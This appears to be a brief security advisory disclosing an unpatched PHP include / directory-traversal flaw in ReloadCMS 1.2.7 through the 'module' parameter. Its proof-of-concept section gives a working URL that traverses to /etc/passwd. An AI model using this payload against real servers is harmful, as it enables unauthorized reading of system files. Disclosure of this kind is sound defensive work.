ReloadCMS Vulnerable

2007-10-2000:00:00

vulners.com

New Advisory:
ReloadCMS
http://reloadcms.com

——————–Summary—————-
Software: ReloadCMS
Sowtware’s Web Site: http://reloadcms.com/main/
Versions: 1.2.7
Critical Level: Moderate
Type: Multiple Vulnerabilities
Class: Remote
Status: Unpatched
PoC/Exploit: Available
Solution: Not Available
Discovered by: http://reloadcms.com

Php include bug

—————–Description—————
vulnerable mosule system.php, parameter GET[&#39;module&#39;] is not properly filtered

————–PoC/Exploit———————-
http://site.url/index.php?module=../../../../etc/passwd

————–Solution———————
No Patch available.

————–Credit———————–
Discovered by: http://reloadcms.com

JSON